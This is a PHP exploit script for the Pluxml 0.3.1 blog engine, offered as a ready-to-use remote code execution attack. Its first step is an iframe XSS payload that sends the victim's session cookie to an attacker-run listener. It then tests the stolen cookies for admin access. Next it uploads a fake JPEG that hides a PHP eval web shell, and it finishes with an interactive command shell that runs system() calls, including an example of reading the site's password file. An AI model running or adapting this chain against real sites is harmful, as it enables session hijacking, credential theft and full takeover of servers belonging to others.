<?php
#
# This file require the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
# Note: The new version is compatible with PHP 4 by default.
##############################################################
error_reporting(E_ALL ^ E_NOTICE);
require('phpsploitclass.php');


# C:\> sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196
# [/]Waiting for connection on http://90.27.10.196:80/
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 182.26.54.2:2007
# [+]Sending 366 bytes to 182.26.54.2:2007
# [+]Received 326 bytes from 182.26.54.2:2009
# [+]Sending 366 bytes to 182.26.54.2:2009
# [+]Received 692 bytes from 182.26.54.2:2010
# [!]Received one cookie from 182.26.54.2:2010
# [/]Verifying if there is a valid session id cookie
# [-]No: pollvote=1
# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b
# [+]The created socket has been shut down
# $shell> whoami
# darkfig
#
if($argc < 5)
{
print("
------------ Pluxml 0.3.1 Remote Code Execution Exploit -------------
---------------------------------------------------------------------
             Credits: DarkFig <gmdarkfig@gmail.com>
                 URL: acid-root.new.fr || mgsdl.free.fr
                 IRC: #acidroot@irc.worldnet.net
                Note: Coded for fun 8)
---------------------------------------------------------------------
   Usage: $argv[0] -url <> -ip <> [Options]
  Params: -url       For example http://victim.com/pluxml0.3.1/
          -ip        The IP that will be bound to the socket
 Options: -port      The socket will listen on this port (default=80)
          -proxy     If you wanna use a proxy <proxyhost:proxyport> 
          -proxyauth Basic authentification <proxyuser:proxypwd>
---------------------------------------------------------------------
");exit(1);
}

# PhpSploit object
####################
$xpl = new phpsploit();
$xpl->agent('Firefox');

# Server
##########
$server_addr = getparam('ip',1);
$server_port = (getparam('port')!='') ? getparam('port') : '80';
$server_url  = "http://$server_addr:$server_port/";

# Victim
##########
$hack = getparam('url',1);
$html = "<h1>hello :)</h1>\n";

# Apparently my XSS bypass NoScript protection
################################################
$xss  = "<iframe src='${hack}pluxml/admin/auth.php?msg="
       ."<script>document.location=(".char($server_url.'?c=')
       .".concat(document.cookie))</script>'"
       ." height=0 width=0>";

# Socket
##########
$handle = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_bind($handle, $server_addr, $server_port);
socket_listen($handle);

print "\n[/]Waiting for connection on $server_url";
print "\n[!]Now you have to make the victim to click on the url";

# Wait until we get admin rights
##################################
while(TRUE)
{
	$packet = '';
	
	if(!$msg = socket_accept($handle))
	   exit(1);

	# End of the packet ?
	######################
	while(!ereg("\r\n\r\n",$packet))
	   $packet .= socket_read($msg, 2048, PHP_BINARY_READ);
	   
        socket_getpeername($msg, $clientaddr, $clientport);
        print "\n[+]Received ".strlen($packet)." bytes from $clientaddr:$clientport";

	# Server response
	##################
	$serv =
	 "HTTP 1.x 200 OK\r\n"
	."Connection: close\r\n"
	."Transfer-Encoding: chunked\r\n"
	."Content-Type: text/html\r\n\r\n"
	.$html.$xss."\r\n\r\n";

	# Is there a cookie ?
	#######################
	if(preg_match("#\?c=(\S*) HTTP/1\.([01x]+)#", $packet, $cookies))
	{
		print "\n[!]Received one cookie from $clientaddr:$clientport";
		print "\n[/]Verifying if there is a valid session id cookie";
		$cookie = explode(';%20',$cookies[1]);
		
		foreach($cookie as $session)
		{
			# Valid session id ?
			#######################
			if(is_valid_session($session))
			
			   # Let's upload a file
			   #######################
			   code_execution();
		}
		print "\n[-]No valid session id cookie found";
		print "\n[/]Always waiting for connection";
	}
	# Answer to the client
	########################
	else
	{
		print "\n[+]Sending ".strlen($serv)." bytes to $clientaddr:$clientport";
		socket_write($msg, $serv, strlen($serv));
	}
	socket_close($msg);
}

# Function which is like getopt()
###################################
function getparam($param,$opt='')
{
	global $argv;
	
	foreach($argv as $value => $key)
	{
		if($key == '-'.$param)
		   return $argv[$value+1];
	}
	
	if($opt)
	   exit("-$param parameter required");
	else
	   return;
}

# Bypass magic_quotes_gpc
###########################
function char($data)
{
	$char = 'String.fromCharCode(';
	
	for($i=0;$i<strlen($data);$i++)
	{
		$char .= ord($data[$i]);
		if($i != (strlen($data)-1))
		   $char .= ',';
	}
	return $char.')';
}

# Admin session always available ?
###################################
function is_valid_session($session)
{
	global $xpl,$hack;
	
	$xpl->addheader('Cookie',$session);
	$xpl->get($hack.'pluxml/admin/index.php');
	
	if(eregi('Location: auth.php', $xpl->getheader()))
	{
		print "\n[-]No: $session";
		return FALSE;
	}
	else
	{
		print "\n[!]Yes: $session";
		return TRUE;
	}
}

# File upload vulnerability
#############################
function code_execution()
{
	global $xpl,$hack,$msg;
	
	socket_close($msg);
	print "\n[+]The created socket has been shut down";
	
	# +images.php [File Upload Vulnerability]
	# |
	# 11. if(!empty($_FILES)){
	# 12.    $uploaddir = '../../images/';
	# 13.    $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
	# 14. if(getimagesize($_FILES['userfile']['tmp_name'])){
	# 15.	 move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile);
	# 16.	 chmod($uploadfile, 0777);
	# 17.	 $msg = 'Image envoyée';
	# 18. }else{
	# 19.	 $msg = 'Le fichier n\'est pas une image';
	# 20. }
	# 21. header('Location: images.php?msg='.$msg);
	# 22. }
	#
	# Fake JPG 1x1
	# 000000A0 007F 3C3F 7068 700D 0A69 6628 6973 7365 ..<?php..if(isse
	# 000000B0 7428 245F 5345 5256 4552 5B48 5454 505F t($_SERVER[HTTP_
	# 000000C0 5348 454C 4C5D 2929 0D0A 7B0D 0A70 7269 SHELL]))..{..pri
	# 000000D0 6E74 2031 3233 3435 3637 3839 3130 3131 nt 1234567891011
	# 000000E0 3132 3B0D 0A65 7661 6C28 245F 5345 5256 12;..eval($_SERV
	# 000000F0 4552 5B48 5454 505F 5348 454C 4C5D 293B ER[HTTP_SHELL]);
	# 00000100 0D0A 7072 696E 7420 3132 3334 3536 3738 ..print 12345678
	# 00000110 3931 3031 3131 323B 0D0A 7D0D 0A3F 3EFF 9101112;..}..?\>.
	#
	$fakejpg =
	"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00"
	."\x60\x00\x60\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06"
	."\x05\x08\x07\x07\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B"
	."\x0C\x19\x12\x13\x0F\x14\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20"
	."\x24\x2E\x27\x20\x22\x2C\x23\x1C\x1C\x28\x37\x29\x2C\x30\x31"
	."\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C\x2E\x33\x34\x32\xFF"
	."\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D\x0D\x18\x32"
	."\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
	."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
	."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
	."\x32\x32\x32\x32\x32\x32\x32\x32\xFF\xFE\x00\x7F\x3C\x3F\x70"
	."\x68\x70\x0D\x0A\x69\x66\x28\x69\x73\x73\x65\x74\x28\x24\x5F"
	."\x53\x45\x52\x56\x45\x52\x5B\x48\x54\x54\x50\x5F\x53\x48\x45"
	."\x4C\x4C\x5D\x29\x29\x0D\x0A\x7B\x0D\x0A\x70\x72\x69\x6E\x74"
	."\x20\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31"
	."\x32\x3B\x0D\x0A\x65\x76\x61\x6C\x28\x24\x5F\x53\x45\x52\x56"
	."\x45\x52\x5B\x48\x54\x54\x50\x5F\x53\x48\x45\x4C\x4C\x5D\x29"
	."\x3B\x0D\x0A\x70\x72\x69\x6E\x74\x20\x31\x32\x33\x34\x35\x36"
	."\x37\x38\x39\x31\x30\x31\x31\x31\x32\x3B\x0D\x0A\x7D\x0D\x0A"
	."\x3F\x3E\xFF\xC0\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00"
	."\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01"
	."\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02"
	."\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00"
	."\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D"
	."\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51\x61"
	."\x07\x22\x71\x14\x32\x81\x91\xA1\x08\x23\x42\xB1\xC1\x15\x52"
	."\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17\x18\x19\x1A\x25"
	."\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45"
	."\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64"
	."\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83"
	."\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99"
	."\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6"
	."\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3"
	."\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8"
	."\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xC4\x00"
	."\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00"
	."\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B"
	."\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05"
	."\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31"
	."\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91"
	."\xA1\xB1\xC1\x09\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24"
	."\x34\xE1\x25\xF1\x17\x18\x19\x1A\x26\x27\x28\x29\x2A\x35\x36"
	."\x37\x38\x39\x3A\x43\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55"
	."\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74"
	."\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A"
	."\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7"
	."\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4"
	."\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA"
	."\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7"
	."\xF8\xF9\xFA\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
	."\x3F\x00\xF7\xFA\x28\xA2\x80\x3F\xFF\xD9";
	
	$formdata = array(
	            frmdt_url => $hack.'pluxml/admin/images.php',
	            'userfile' => array(
	                          frmdt_filename => 'iwashere.php',
	                          frmdt_content => $fakejpg));

	$xpl->formdata($formdata);
	print "\n\$shell> ";

	while(!preg_match('#^(quit|exit)$#', ($cmd = trim(fgets(STDIN)))))
	{
		# $shell> cat ../pluxml/conf/password.xml
		########################################
		$xpl->addheader('Shell',"system('$cmd');");
		$xpl->get($hack.'images/iwashere.php');
		$content = explode('1.23456789101E+014',$xpl->getcontent());
		print $content[1]."\n\$shell> ";
	}
	exit(0);
}

?>